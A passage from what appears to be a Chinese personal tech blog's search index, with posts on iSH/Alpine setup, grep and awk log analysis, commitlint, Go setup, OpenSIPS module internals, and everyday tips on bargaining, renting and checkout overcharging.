但是不更新的话,可能很多安装包都没有,所以最好先更新。\n在更新之前。最好执行下面的命令,把apk的源换成清华的,这样之后的安装软件会比较快点。\nsed -i \u0026#39;s/dl-cdn.alpinelinux.org/mirrors.tuna.tsinghua.edu.cn/g\u0026#39; /etc/apk/repositories apk update step4: 安装各种开发工具 git zsh tmux vim\u0026hellip; apk add git zsh tmux vim step5: 安装oh-my-zsh 这是必不可少的神器 因为从github上克隆oh-my-zsh可能会很慢,所以我用了码云上的一个仓库。 这样速度就会很快了。\ngit clone https://gitee.com/nuannuande/oh-my-zsh.git ~/.oh-my-zsh cp ~/.oh-my-zsh/templates/zshrc.zsh-template ~/.zshrc chsh -s $(which zsh) step6: 安装nodejs python golang等。 apk add nodejs python3 下面看到输出了nodejs和python的版本,说明安装成功。另外ish支持换肤的。之前的白色的,下面的是黑色的。","title":"在iPhone iPad上搭建Linux本地开发环境"},{"content":"环境mac\n# 这个目录打包之后,内部的顶层目录是dist, 解压之后,有可能覆盖到以前的dist tar -zcvf demo.tar.gz dist/ # 使用这个命令,顶层目录将会被修改成demo-0210 tar -s /^dist/demo-0210/ -zcvf demo.tar.gz dist/ ","permalink":"https://wdd.js.org/posts/2020/10/sxuez4/","summary":"环境mac\n# 这个目录打包之后,内部的顶层目录是dist, 解压之后,有可能覆盖到以前的dist tar -zcvf demo.tar.gz dist/ # 使用这个命令,顶层目录将会被修改成demo-0210 tar -s /^dist/demo-0210/ -zcvf demo.tar.gz dist/ ","title":"tar打包小技巧: 替换根目录"},{"content":"只要有价格,就可以讲价 ****只要有价格,就可以讲价。**但是也有例外,例如超市,超市的东西明码标价。售货员一般不会管价格。\n其次,要和能管价的人谈 **其次,要和能管价的人谈。 有些人不管价格,讲多少都没用。\n50%理论 第一次喊价以后,一般只会抬价,而不会降价,所以务必要重视。\n例如一束花,店家要价80,实际这束花成本20。如果你第一喊价70,那你只能优惠小于10元。\n第一次喊价要低于心理价位,这样才有留够上涨的空间 **50%理论 ,**一般你的第一次出价可以按照卖家要价的50%开始喊价。然后再利用各种计策。提高价格,这里最重要的是摸出买家的底价,高于这个低价,买家才会卖。80元的花,你的第一次出价可以喊40元。 脸皮要厚,脸皮厚,才能要更多优惠 ","permalink":"https://wdd.js.org/posts/2020/10/ahtqix/","summary":"只要有价格,就可以讲价 ****只要有价格,就可以讲价。**但是也有例外,例如超市,超市的东西明码标价。售货员一般不会管价格。\n其次,要和能管价的人谈 **其次,要和能管价的人谈。 有些人不管价格,讲多少都没用。\n50%理论 第一次喊价以后,一般只会抬价,而不会降价,所以务必要重视。\n例如一束花,店家要价80,实际这束花成本20。如果你第一喊价70,那你只能优惠小于10元。\n第一次喊价要低于心理价位,这样才有留够上涨的空间 **50%理论 ,**一般你的第一次出价可以按照卖家要价的50%开始喊价。然后再利用各种计策。提高价格,这里最重要的是摸出买家的底价,高于这个低价,买家才会卖。80元的花,你的第一次出价可以喊40元。 脸皮要厚,脸皮厚,才能要更多优惠 ","title":"讲价的学问"},{"content":"预处理 从一个文件中过滤 grep key file ➜ grep ERROR a.log 12:12 ERROR:core bad message 从多个文件中过滤 grep key file1 fil2 多文件搜索,指定多个文件 grep key *.log 使用正则的方式,匹配多个文件 grep -h key *.log 可以使用-h, 让结果中不出现文件名。默认文件名会出现在匹配行的前面。 ➜ grep ERROR a.log b.log a.log:12:12 ERROR:core bad message b.log:13:12 ERROR:core bad message ➜ grep ERROR *.log a.log:12:12 ERROR:core bad message b.log:13:12 ERROR:core bad message 多个关键词过滤 grep -e key1 -e key2 file 使用-e参数,可以制定多个关键词 ➜ grep -e ERROR -e INFO a.log 12:12 ERROR:core bad message 12:12 INFO:parse bad message1 正则过滤 grep -E REG file 下面例子是匹配db:后跟数字部分 ➜ grep -E \u0026#34;db:\\d+ \u0026#34; a.log 12:14 WARNING:db:1 bad message 12:14 WARNING:db:21 bad message 12:14 WARNING:db:2 bad message1 12:14 WARNING:db:4 bad message 仅输出匹配字段 grep -o args 使用-o参数,可以仅仅输出匹配项,而不是整个匹配的行 ➜ go-tour grep -o -E \u0026#34;db:\\d+ \u0026#34; a.log db:1 db:21 db:2 db:4 统计关键词出现的行数 例如一个nginx的access.log, 我们想统计其中的POST的个数,和OPTIONS的个数。\n先写一个脚本,名为method.ack\nBEGIN{ post_lines = 0 options_lines = 0 printf \u0026#34;start\\n\u0026#34; } /POST/ { post_lines++ } /OPTIONS/ { options_lines++ } END { printf \u0026#34;post_lines: %s, \\noptions_lines: %s \\n\u0026#34;,post_lines,options_lines } 然后执行\nack -f method.ack access.log 时间处理 比如给你一个nginx的access.log, 让你按照每秒,每分钟统计下请求量的大小,如何做呢?\n首先取出日志行中的时间,然后从事件中取出秒 awk '{print $4}' 10.32.104.47 - - [29/Sep/2020:06:43:53 +0800] \u0026#34;OPTIONS url HTTP/1.1\u0026#34; 200 0 \u0026#34;\u0026#34; \u0026#34;Mozi Safari/537.36\u0026#34; \u0026#34;-\u0026#34; awk \u0026#39;{print $4}\u0026#39; access.log [29/Sep/2020:05:15:27 [29/Sep/2020:05:15:27 [29/Sep/2020:05:15:27 [29/Sep/2020:05:15:27 [29/Sep/2020:05:15:27 [29/Sep/2020:05:15:27 那如何取出分钟呢?使用ack的字符串函数, substr(str, startIndex, len) awk \u0026#39;{print substr($4,0,18)}\u0026#39; access.log [29/Sep/2020:05:23 [29/Sep/2020:05:23 对输出结果进行 uniq -c 统计出现重复行的次数。即单位事件内时间重复的次数,也就是单位事件内的请求数。\n625 [29/Sep/2020:06:36 625 [29/Sep/2020:06:37 624 [29/Sep/2020:06:38 624 [29/Sep/2020:06:39 651 [29/Sep/2020:06:40 626 [29/Sep/2020:06:41 624 [29/Sep/2020:06:42 560 [29/Sep/2020:06:43 排序与去重 sort 按照某一列去重 按照多列去重 vim专项练习 :set nowrap 取消自动换行 :set nu 显示行号 :%!awk '{$2=\u0026quot;\u0026quot;;print $0}' 删除指定的列 :%!awk '{print $3,$4}' 挑选指定的列 :g/key/d 删除匹配的行 :v/key/d 删除不匹配的行 :g/key/p 仅仅显示匹配的行 :v/key/p 仅仅显示不匹配的行 /key1\\|key2 查找多个关键词 :nohl 移除高亮 核武器 lnav 过滤 统计图 select cs_method , count( cs_method ) FROM access_log group by cs_method ","permalink":"https://wdd.js.org/posts/2020/04/qlqhiv/","summary":"预处理 从一个文件中过滤 grep key file ➜ grep ERROR a.log 12:12 ERROR:core bad message 从多个文件中过滤 grep key file1 fil2 多文件搜索,指定多个文件 grep key *.log 使用正则的方式,匹配多个文件 grep -h key *.log 可以使用-h, 让结果中不出现文件名。默认文件名会出现在匹配行的前面。 ➜ grep ERROR a.log b.log a.log:12:12 ERROR:core bad message b.log:13:12 ERROR:core bad message ➜ grep ERROR *.log a.log:12:12 ERROR:core bad message b.log:13:12 ERROR:core bad message 多个关键词过滤 grep -e key1 -e key2 file 使用-e参数,可以制定多个关键词 ➜ grep -e ERROR -e INFO a.log 12:12 ERROR:core bad message 12:12 INFO:parse bad message1 正则过滤 grep -E REG file 下面例子是匹配db:后跟数字部分 ➜ grep -E \u0026#34;db:\\d+ \u0026#34; a.","title":"[todo]锋利的linux日志分析命令"},{"content":"虽然flash已经几乎被淘汰了,但是在某些老版本的IE里面,依然有他们顽强的身影。\n使用flash 模拟websocket, 有时会遇到下面的问题。虽然flash安全策略文件已经部署,但是客户端依然报错。\n[WebSocket] cannot connect to Web Socket Server at \u0026hellip; make sure the server is runing and Flash policy file is correct placed.\n解决方案:\n在**%WINDIR%\\System32\\Macromed\\Flash**下创建一个名为mms.cfg的文件, 如果文件已经存在,则不用创建。\n文件内容如下:\nDisableSockets=0 flash_player_admin_guide.pdf\n","permalink":"https://wdd.js.org/posts/2020/09/thg9yu/","summary":"虽然flash已经几乎被淘汰了,但是在某些老版本的IE里面,依然有他们顽强的身影。\n使用flash 模拟websocket, 有时会遇到下面的问题。虽然flash安全策略文件已经部署,但是客户端依然报错。\n[WebSocket] cannot connect to Web Socket Server at \u0026hellip; make sure the server is runing and Flash policy file is correct placed.\n解决方案:\n在**%WINDIR%\\System32\\Macromed\\Flash**下创建一个名为mms.cfg的文件, 如果文件已经存在,则不用创建。\n文件内容如下:\nDisableSockets=0 flash_player_admin_guide.pdf","title":"flash_player_admin_guide"},{"content":"建议先看下前提知识:https://www.ruanyifeng.com/blog/2016/01/commit_message_change_log.html\n提交信息规范 通用类型的头字段\nbuild 构建 ci 持续继承工具 chore 构建过程或辅助工具的变动 docs 文档(documentation) feat 新功能(feature) fix 修补bug perf 性能优化 refactor 重构(即不是新增功能,也不是修改bug的代码变动) revert style 格式(不影响代码运行的变动) test 增加测试 git commit -m \u0026#34;fix: xxxxxx\u0026#34; git commit -m \u0026#34;feat: xxxxxx\u0026#34; 安装 安装依赖 yarn add -D @commitlint/config-conventional @commitlint/cli husky 修改package.json 在package.json中加入\n\u0026#34;husky\u0026#34;: { \u0026#34;hooks\u0026#34;: { \u0026#34;commit-msg\u0026#34;: \u0026#34;commitlint -E HUSKY_GIT_PARAMS\u0026#34; } } 新增配置 文件名:commitlint.config.js\nmodule.exports = {extends: [\u0026#39;@commitlint/config-conventional\u0026#39;]} 测试 如果你的提交不符合规范,提交将会失败。\n➜ git commit -am \u0026#34;00\u0026#34; warning ../package.json: No license field husky \u0026gt; commit-msg (node v12.18.3) ⧗ input: 00 ✖ subject may not be empty [subject-empty] ✖ type may not be empty [type-empty] ✖ found 2 problems, 0 warnings ⓘ Get help: https://github.com/conventional-changelog/commitlint/#what-is-commitlint 根据commitlog生成changelog 下面命令中的1.5.5 1.5.10可以是两个tag, 也可以是两个分支。\ngit log 可以提取两个点之间的commitlog, 使用\u0026hellip;\ngit log --pretty=format:\u0026#34;[%h] %s (%an)\u0026#34; 1.5.5...1.5.10 | sort -k2,2 \u0026gt; changelog.md 参考 https://github.com/conventional-changelog/commitlint/tree/master/@commitlint/config-angular https://www.ruanyifeng.com/blog/2016/01/commit_message_change_log.html ","permalink":"https://wdd.js.org/posts/2020/09/vu0ag0/","summary":"建议先看下前提知识:https://www.ruanyifeng.com/blog/2016/01/commit_message_change_log.html\n提交信息规范 通用类型的头字段\nbuild 构建 ci 持续继承工具 chore 构建过程或辅助工具的变动 docs 文档(documentation) feat 新功能(feature) fix 修补bug perf 性能优化 refactor 重构(即不是新增功能,也不是修改bug的代码变动) revert style 格式(不影响代码运行的变动) test 增加测试 git commit -m \u0026#34;fix: xxxxxx\u0026#34; git commit -m \u0026#34;feat: xxxxxx\u0026#34; 安装 安装依赖 yarn add -D @commitlint/config-conventional @commitlint/cli husky 修改package.json 在package.json中加入\n\u0026#34;husky\u0026#34;: { \u0026#34;hooks\u0026#34;: { \u0026#34;commit-msg\u0026#34;: \u0026#34;commitlint -E HUSKY_GIT_PARAMS\u0026#34; } } 新增配置 文件名:commitlint.config.js\nmodule.exports = {extends: [\u0026#39;@commitlint/config-conventional\u0026#39;]} 测试 如果你的提交不符合规范,提交将会失败。\n➜ git commit -am \u0026#34;00\u0026#34; warning ../package.json: No license field husky \u0026gt; commit-msg (node v12.","title":"使用commitlint检查git提交信息是否合规"},{"content":"1. 如何安装go 本次安装环境是win10子系统 ubuntu 20.04\n打开网站 https://golang.google.cn/dl/\n选择合适的最新版的连接\ncd mkdir download cd download wget https://golang.google.cn/dl/go1.16.3.linux-amd64.tar.gz tar -C /usr/local -xvf go1.16.3.linux-amd64.tar.gz 因为我用的是zsh 所以我在~/.zshrc中,将go的bin目录加入到PATH中 export PATH=$PATH:/usr/local/go/bin 保存.zshrc之后 source ~/.zshrc ➜ download go version go version go1.16.3 linux/amd64 2. go proxy设置 Go 1.13 及以上(推荐)\n打开你的终端并执行\ngo env -w GO111MODULE=on go env -w GOPROXY=https://goproxy.cn,direct 3. go get 下载的文件在哪? 检查 go env\nGOPATH=\u0026#34;/Users/wangdd/go” /Users/wangdd/go/pkg/mod total 0 drwxr-xr-x 4 wangdd staff 128B Sep 14 09:17 cache drwxr-xr-x 8 wangdd staff 256B Sep 14 09:17 github.com drwxr-xr-x 3 wangdd staff 96B Sep 14 09:17 golang.org 路径在GOPATH/pkg/mod 目录下\n4. cannot find module providing package github.com 在项目根目录执行\ngo mod init module_name 5. 选择什么Web框架 fiber 如果你要写一个web服务器,最快速的方式是挑选一个熟悉的框架。 如果你熟悉Node.js中的express框架,那你会非常快速的上手fiber,因为fiber就是参考express做的。\nhttps://github.com/gofiber/fiber\n6. 自动构建 air npm中有个包,叫做nodemon,它会在代码变更之后,重启服务器。\n如果你需要在golang中类似的功能,可以使用https://github.com/cosmtrek/air\n7. 如何查看官方库文档 go doc fmt | less ","permalink":"https://wdd.js.org/golang/golang-start-faq/","summary":"1. 如何安装go 本次安装环境是win10子系统 ubuntu 20.04\n打开网站 https://golang.google.cn/dl/\n选择合适的最新版的连接\ncd mkdir download cd download wget https://golang.google.cn/dl/go1.16.3.linux-amd64.tar.gz tar -C /usr/local -xvf go1.16.3.linux-amd64.tar.gz 因为我用的是zsh 所以我在~/.zshrc中,将go的bin目录加入到PATH中 export PATH=$PATH:/usr/local/go/bin 保存.zshrc之后 source ~/.zshrc ➜ download go version go version go1.16.3 linux/amd64 2. go proxy设置 Go 1.13 及以上(推荐)\n打开你的终端并执行\ngo env -w GO111MODULE=on go env -w GOPROXY=https://goproxy.cn,direct 3. go get 下载的文件在哪? 检查 go env\nGOPATH=\u0026#34;/Users/wangdd/go” /Users/wangdd/go/pkg/mod total 0 drwxr-xr-x 4 wangdd staff 128B Sep 14 09:17 cache drwxr-xr-x 8 wangdd staff 256B Sep 14 09:17 github.","title":"Golang初学者的问题"},{"content":"在上海工作的人,除了一年一次的春运,就可能是就是一年一次的找房搬家了。\n找房彷佛就是一趟西天取经,要经历九九八十一难,也要个各种妖魔鬼怪斗智斗勇。这其中难处,暂且不表。重点介绍你应当如何去按照一定的方案来检查各种设施的功能。\n要知道,世事多变,你现下找的房子如果很不错,即使后期突然需要转租,也是比较容易转租的。否则房子转租不出去,自己也白白赔了押金。\n重点检查\n洗衣机 空调 冰箱 抽油烟机 马桶 上面这些设备,不要斤斤打眼看看外表正不正常,更要尽可能去试试。比如说马桶,即使能无法坐在上面上个厕所,你也要用手按一下,看看冲水是否正常。 交钱之前你是二房东大爷,交完钱签好合同,二房东就是你大爷了。马桶要是不好用,浪费水不说,还影响心情。到时候你找你大爷来修,你大爷就不一定有时间了。你大爷一般包了几百套房子,怎么会管你的小问题呢。\n总之呢,你要有自己的一个检查清单项目,要检查哪些,如何检查,务必做到切实可行。\n有的时候,房子有些问题,房东和中介故意顾左右而言他,你切不可被他们玩的团团转。一定要按照既定的方案实施检查。\n另外就是签合同了,违约金这块要注意的。有的中介和二房东狼狈为奸,除了要不退押金,还要有额外的赔钱项。这点务必要注意。正常来处,如果转租不出去,你有确定要退房,一般只有不退押金,没有其他的赔钱项。这点要在租房合同上写清楚。\n凡是没有黑纸白纸写清楚的,你都可以认为是中介和二房东在忽悠。\n","permalink":"https://wdd.js.org/posts/2020/09/xglwgs/","summary":"在上海工作的人,除了一年一次的春运,就可能是就是一年一次的找房搬家了。\n找房彷佛就是一趟西天取经,要经历九九八十一难,也要个各种妖魔鬼怪斗智斗勇。这其中难处,暂且不表。重点介绍你应当如何去按照一定的方案来检查各种设施的功能。\n要知道,世事多变,你现下找的房子如果很不错,即使后期突然需要转租,也是比较容易转租的。否则房子转租不出去,自己也白白赔了押金。\n重点检查\n洗衣机 空调 冰箱 抽油烟机 马桶 上面这些设备,不要斤斤打眼看看外表正不正常,更要尽可能去试试。比如说马桶,即使能无法坐在上面上个厕所,你也要用手按一下,看看冲水是否正常。 交钱之前你是二房东大爷,交完钱签好合同,二房东就是你大爷了。马桶要是不好用,浪费水不说,还影响心情。到时候你找你大爷来修,你大爷就不一定有时间了。你大爷一般包了几百套房子,怎么会管你的小问题呢。\n总之呢,你要有自己的一个检查清单项目,要检查哪些,如何检查,务必做到切实可行。\n有的时候,房子有些问题,房东和中介故意顾左右而言他,你切不可被他们玩的团团转。一定要按照既定的方案实施检查。\n另外就是签合同了,违约金这块要注意的。有的中介和二房东狼狈为奸,除了要不退押金,还要有额外的赔钱项。这点务必要注意。正常来处,如果转租不出去,你有确定要退房,一般只有不退押金,没有其他的赔钱项。这点要在租房合同上写清楚。\n凡是没有黑纸白纸写清楚的,你都可以认为是中介和二房东在忽悠。","title":"租房的检查清单"},{"content":"大部分人结账付钱的时候,都不怎么关注。很多次被收银员褥羊毛了也毫不察觉。\n场景1:\n你去买水果,看到苹果比较新鲜,价格8元/每斤,但是收银员称重计费的时候,是按照12元/每斤计算的。但是当时你在打开支付宝准备付钱,没有注意称上的单价。付费过后,收银员没给你小票。你也没注意,事情就这么过去了。 如果你对收银员按的单价表示怀疑,问了句:这苹果怎么和标价上不一致? 收银员尴尬的笑了笑,说到:不好意思,我按错了。比较老练的可能会说:不好意思,我还以为你拿的是旁边的那种水果呢?\n场景2:\n你和朋友一起去吃烤鱼,点了一条清江鱼,服务员称重过后,在菜单上用铅笔写了3.5斤。酒足饭饱之后,你去结账。收银员开出小票,上面写的清江鱼 4.2斤,你也没注意。甚至有可能那个铅笔写的斤数已经被酒水的污渍涂抹的不清楚了。如果有表示怀疑,仔细看了看小票,说鱼的重量不对。收银员又尴尬的笑了笑,说到:不好意思,这个可能记得别的桌的鱼的重量的。\n场景3:\n你买了一包垃圾袋7元,一包衣服撑18,一个垃圾桶6,五金店的老板也没用计算机,抬头望着天空的那朵白云。彷佛再做云计算,然后说:一共38块。\nshit! 很多人真的就直接掏钱了。\n你看看,收银员说的不好意思多值钱,简直是一字千金啊!但是更多时候,我们都是稀里糊涂的蒙在鼓里。\n要想不被辱羊毛,务必要谨记。\n商品的标价要谨记于心 不要相信收银员的信口开河的算钱,要自己算 买完东西,一定要问收银员要小票 收银员称重的时候,要注意观察称上显示的价格和摆货区的价格是否一致 ","permalink":"https://wdd.js.org/posts/2020/09/hpc6fy/","summary":"大部分人结账付钱的时候,都不怎么关注。很多次被收银员褥羊毛了也毫不察觉。\n场景1:\n你去买水果,看到苹果比较新鲜,价格8元/每斤,但是收银员称重计费的时候,是按照12元/每斤计算的。但是当时你在打开支付宝准备付钱,没有注意称上的单价。付费过后,收银员没给你小票。你也没注意,事情就这么过去了。 如果你对收银员按的单价表示怀疑,问了句:这苹果怎么和标价上不一致? 收银员尴尬的笑了笑,说到:不好意思,我按错了。比较老练的可能会说:不好意思,我还以为你拿的是旁边的那种水果呢?\n场景2:\n你和朋友一起去吃烤鱼,点了一条清江鱼,服务员称重过后,在菜单上用铅笔写了3.5斤。酒足饭饱之后,你去结账。收银员开出小票,上面写的清江鱼 4.2斤,你也没注意。甚至有可能那个铅笔写的斤数已经被酒水的污渍涂抹的不清楚了。如果有表示怀疑,仔细看了看小票,说鱼的重量不对。收银员又尴尬的笑了笑,说到:不好意思,这个可能记得别的桌的鱼的重量的。\n场景3:\n你买了一包垃圾袋7元,一包衣服撑18,一个垃圾桶6,五金店的老板也没用计算机,抬头望着天空的那朵白云。彷佛再做云计算,然后说:一共38块。\nshit! 很多人真的就直接掏钱了。\n你看看,收银员说的不好意思多值钱,简直是一字千金啊!但是更多时候,我们都是稀里糊涂的蒙在鼓里。\n要想不被辱羊毛,务必要谨记。\n商品的标价要谨记于心 不要相信收银员的信口开河的算钱,要自己算 买完东西,一定要问收银员要小票 收银员称重的时候,要注意观察称上显示的价格和摆货区的价格是否一致 ","title":"如何避免被收银员坑"},{"content":"System Calls 应用程序工作在用户模式 应用程序不能直接访问硬件资源,应用程序需要调用操作系统提供的接口间接访问。这个叫做系统调用。一般的系统调用都是阻塞的。阻塞的意思就是你在网上买了个苹果,在你收到这个快递之前,你啥也不干,就躺在床上等着。 非阻塞 非阻塞的程序,在系统调用时,会立即返回一个标shi ","permalink":"https://wdd.js.org/posts/2020/09/upi47f/","summary":"System Calls 应用程序工作在用户模式 应用程序不能直接访问硬件资源,应用程序需要调用操作系统提供的接口间接访问。这个叫做系统调用。一般的系统调用都是阻塞的。阻塞的意思就是你在网上买了个苹果,在你收到这个快递之前,你啥也不干,就躺在床上等着。 非阻塞 非阻塞的程序,在系统调用时,会立即返回一个标shi ","title":"IO性能 Node vs PHP vs Java vs Go"},{"content":"为什么要用iPad开发? 第一,我不想再买台电脑或者笔记本放在家里。因为我也不用电脑来打游戏。而且无论台式机还是笔记本都比较占地方。搬家也费劲。 第二,我只有一台MacBook Pro,以前下班也会背着,因为总有些事情需要做。但是自从有一天觉得肩膀不舒服了,我就决定不再背电脑。廉颇老矣,腰酸背痛。 虽然不再背电脑,但是偶有雅兴,心血来潮,我还需要写点博客或者代码的。 所以我买了台iPad来开发或者写博客。 前期准备工作 硬件准备 一台iPad 一个蓝牙键盘。最好买那种适合笔记本的蓝牙键盘,千万不要买可折叠的蓝牙键盘,因为用着不舒服 软件准备 常规的功能,例如写文字,写博客,一个浏览器足以胜任。唯一的难点在于如何编程。\n目前来说,有两个方案:\n方案1: 使用在线编辑器。例如码云,github, codepen等网站,都是提供在线编辑器的。优点是方便,免费。缺点也很明显,无法调试或者运行代码。 方案2: 购买云主机,iPad上安装Termius, ssh远程连接到服务端,在真正的操作系统中做开发。优点是比较自由,扩展性强。缺点是需要花钱,而且在没有IDE环境做开发是有不小的难度的。 方案1由于比较简单,就不赘述了。\n着重讲讲方案2:\n购买云主机 一般来说,即使是最低配置的主机,一年的费用也至少要几百块。但是也有例外情况。我的目标是找那些年费在一百块以内的云主机。\n针对大学生的优惠。一般大学生可以以几十块的价钱买到最低配的云主机。 针对新用户的优惠。新用户的优惠力度还是很大的。一般用过一年之后,我就会转站其他云服务提供商。所以国内的好多朵公有云,基本上我都上过。唯一没上过的就是筋斗云。 特殊优惠日。一般来说,一年之内,至少存在两个优惠日,双十一和六一八。在这两个时间点,一般可以买到比较优惠的云主机。 开发环境搭建 使用Terminue连接到远程服务器上。注意最好在公有云上使用公钥登录,并禁止掉密码登录。最好再安装个fail2ban。因为每个云主机基本上每天都有很多恶意的登录尝试。 需要安装oh-my-zsh. 最好用的sh, 不解释。 作为开发环境,一个屏幕肯定是不够的,所以你需要tmux. 编辑器呢。锻炼自己的VIM使用能力吧。VIM是个外边比较冰冷的编辑器,上手难度相比于那些花花绿绿的编辑器而言,显得那么格格不入。但是就像有首歌唱的的,有些人不知道那些好,但就是谁也替代不了。 总之呢,你必须要强迫自己能够熟练的运用以下的几个软件:\nVIM tumx 后记 ","permalink":"https://wdd.js.org/posts/2020/09/rzumhc/","summary":"为什么要用iPad开发? 第一,我不想再买台电脑或者笔记本放在家里。因为我也不用电脑来打游戏。而且无论台式机还是笔记本都比较占地方。搬家也费劲。 第二,我只有一台MacBook Pro,以前下班也会背着,因为总有些事情需要做。但是自从有一天觉得肩膀不舒服了,我就决定不再背电脑。廉颇老矣,腰酸背痛。 虽然不再背电脑,但是偶有雅兴,心血来潮,我还需要写点博客或者代码的。 所以我买了台iPad来开发或者写博客。 前期准备工作 硬件准备 一台iPad 一个蓝牙键盘。最好买那种适合笔记本的蓝牙键盘,千万不要买可折叠的蓝牙键盘,因为用着不舒服 软件准备 常规的功能,例如写文字,写博客,一个浏览器足以胜任。唯一的难点在于如何编程。\n目前来说,有两个方案:\n方案1: 使用在线编辑器。例如码云,github, codepen等网站,都是提供在线编辑器的。优点是方便,免费。缺点也很明显,无法调试或者运行代码。 方案2: 购买云主机,iPad上安装Termius, ssh远程连接到服务端,在真正的操作系统中做开发。优点是比较自由,扩展性强。缺点是需要花钱,而且在没有IDE环境做开发是有不小的难度的。 方案1由于比较简单,就不赘述了。\n着重讲讲方案2:\n购买云主机 一般来说,即使是最低配置的主机,一年的费用也至少要几百块。但是也有例外情况。我的目标是找那些年费在一百块以内的云主机。\n针对大学生的优惠。一般大学生可以以几十块的价钱买到最低配的云主机。 针对新用户的优惠。新用户的优惠力度还是很大的。一般用过一年之后,我就会转站其他云服务提供商。所以国内的好多朵公有云,基本上我都上过。唯一没上过的就是筋斗云。 特殊优惠日。一般来说,一年之内,至少存在两个优惠日,双十一和六一八。在这两个时间点,一般可以买到比较优惠的云主机。 开发环境搭建 使用Terminue连接到远程服务器上。注意最好在公有云上使用公钥登录,并禁止掉密码登录。最好再安装个fail2ban。因为每个云主机基本上每天都有很多恶意的登录尝试。 需要安装oh-my-zsh. 最好用的sh, 不解释。 作为开发环境,一个屏幕肯定是不够的,所以你需要tmux. 编辑器呢。锻炼自己的VIM使用能力吧。VIM是个外边比较冰冷的编辑器,上手难度相比于那些花花绿绿的编辑器而言,显得那么格格不入。但是就像有首歌唱的的,有些人不知道那些好,但就是谁也替代不了。 总之呢,你必须要强迫自己能够熟练的运用以下的几个软件:\nVIM tumx 后记 ","title":"使用iPad开发折腾记"},{"content":"早上六点多起床,搭乘半个小时的地铁,来到医院做体验。\n在抽血排队叫号的时候,我看到一位老奶奶被她女儿搀扶着坐在抽血的窗口前。\n老奶奶把右边的胳膊伸到抽血的垫子上,那是让人看一眼就难以忘记的皮肤。她的皮肤非常松弛,布满了褶皱,褶皱上有各种棕色和深色的斑点。\n我回想起了高中时学的生物学,皮肤是人类最大的一个器官,并且是保护人体的第一道防线。\n我不禁看了看自己胳膊,思绪万千。或许以后我的皮肤也是这样吧。这就是岁月的皮肤!\n时间啊!你走的慢点吧!\n人生很短,做些值得回忆的事情吧。\n","permalink":"https://wdd.js.org/posts/2020/08/cs9htr/","summary":"早上六点多起床,搭乘半个小时的地铁,来到医院做体验。\n在抽血排队叫号的时候,我看到一位老奶奶被她女儿搀扶着坐在抽血的窗口前。\n老奶奶把右边的胳膊伸到抽血的垫子上,那是让人看一眼就难以忘记的皮肤。她的皮肤非常松弛,布满了褶皱,褶皱上有各种棕色和深色的斑点。\n我回想起了高中时学的生物学,皮肤是人类最大的一个器官,并且是保护人体的第一道防线。\n我不禁看了看自己胳膊,思绪万千。或许以后我的皮肤也是这样吧。这就是岁月的皮肤!\n时间啊!你走的慢点吧!\n人生很短,做些值得回忆的事情吧。","title":"岁月的皮肤"},{"content":"我挺喜欢看动漫的,尤其是日漫(似乎也没有别的选择🐶)。\n小时候星空卫视放七龙珠,大学追火影和海贼王。日漫中梦想和激战总是少不了,这也是少年所必不可少的。但是日漫有个很大的特点,就是烂尾。\n没办法,漫画一旦达到了一定的连载时期,很多时候往往不受原作者控制了。这其中可能涉及到不少人的利益纠葛。\n与动辄几百集的日漫相比,美漫似乎更加偏向于短小精悍。\n近年来我也看过一些不错的美漫。例如瑞克和莫提,脆莓公园。这类漫画有个特点,就是更加现实,当然其中也不乏有温情出现。看这类漫画,让我想到李宗吾先生所说的厚黑学。感觉美国人是无师自通,深谙厚黑之哲学。\n也许动漫没有变,变的是我们自己:从梦想和激战转变到现实和厚黑。\n","permalink":"https://wdd.js.org/posts/2020/08/ybgr0g/","summary":"我挺喜欢看动漫的,尤其是日漫(似乎也没有别的选择🐶)。\n小时候星空卫视放七龙珠,大学追火影和海贼王。日漫中梦想和激战总是少不了,这也是少年所必不可少的。但是日漫有个很大的特点,就是烂尾。\n没办法,漫画一旦达到了一定的连载时期,很多时候往往不受原作者控制了。这其中可能涉及到不少人的利益纠葛。\n与动辄几百集的日漫相比,美漫似乎更加偏向于短小精悍。\n近年来我也看过一些不错的美漫。例如瑞克和莫提,脆莓公园。这类漫画有个特点,就是更加现实,当然其中也不乏有温情出现。看这类漫画,让我想到李宗吾先生所说的厚黑学。感觉美国人是无师自通,深谙厚黑之哲学。\n也许动漫没有变,变的是我们自己:从梦想和激战转变到现实和厚黑。","title":"从日漫到美漫"},{"content":"module_exports 这个结构在每个模块中都有,这个有点类似js的export或者说是node.js的module.export。\n这是一个接口的规范。\n重要讲解几个关键点:\nlocal_zone_code是模块名字,这个是必需的 cmds表示在opensips脚本里可以有那些暴露的函数 params规定了模块的参数 mod_init在模块初始化的时候会被调用, 只会被调用一次 关于module_exports这个结构的定义,可以查阅:sr_module.h文件\nstruct module_exports exports= { \u0026#34;local_zone_code\u0026#34;, MOD_TYPE_DEFAULT,/* class of this module */ MODULE_VERSION, DEFAULT_DLFLAGS, /* dlopen flags */ 0, /* load function */ NULL, /* OpenSIPS module dependencies */ cmds, 0, params, 0, /* exported statistics */ 0, /* exported MI functions */ 0, /* exported pseudo-variables */ 0, /* exported transformations */ 0, /* extra processes */ 0, /* pre-init function */ mod_init, (response_function) 0, (destroy_function) 0, 0 /* per-child init function */ }; cmds struct cmd_export_ { char* name; /* opensips脚本里的函数名 */ cmd_function function; /* 关联的C代码里的函数 */ int param_no; /* 参数的个数 */ fixup_function fixup; /* 修正参数 */ free_fixup_function free_fixup; /* 修正参数的 */ int flags; /* 函数flag,主要是用来标记函数可以在哪些路由中使用 */ }; cmd_function\ntypedef int (*cmd_function)(struct sip_msg*, char*, char*, char*, char*, char*, char*); cmd_function与fixup_function的关系 cmd_function是在opensips运行后,在路由脚本中会执行到 fixup_function实际上是在opensips运行前,脚本解析完成后会执行 fixup_function的目的是在脚本解析阶段发现参数的问题,或者修改某些参数的值 真实的栗子:\nstatic cmd_export_t cmds[]={ {\u0026#34;lzc_change\u0026#34;, (cmd_function)change_code, 2, change_code_fix, 0, REQUEST_ROUTE}, {0,0,0,0,0,0} }; static int change_code_fix(void** param, int param_no) { LM_INFO(\u0026#34;enter change_code_fix: param: %s\\n\u0026#34;, (char *)*param); LM_INFO(\u0026#34;enter change_code_fix: param_no: %d\\n\u0026#34;, param_no); LM_INFO(\u0026#34;enter change_code_fix: local_zone_code: %s len:%d\\n\u0026#34;, local_zone_code.s,local_zone_code.len); return 0; } 上面的定义,可以在opensips脚本中使用lzc_change这个函数。这个函数对应c代码里的change_code函数。这个函数允许接受2两个参数。\nopensips脚本\nroute{ 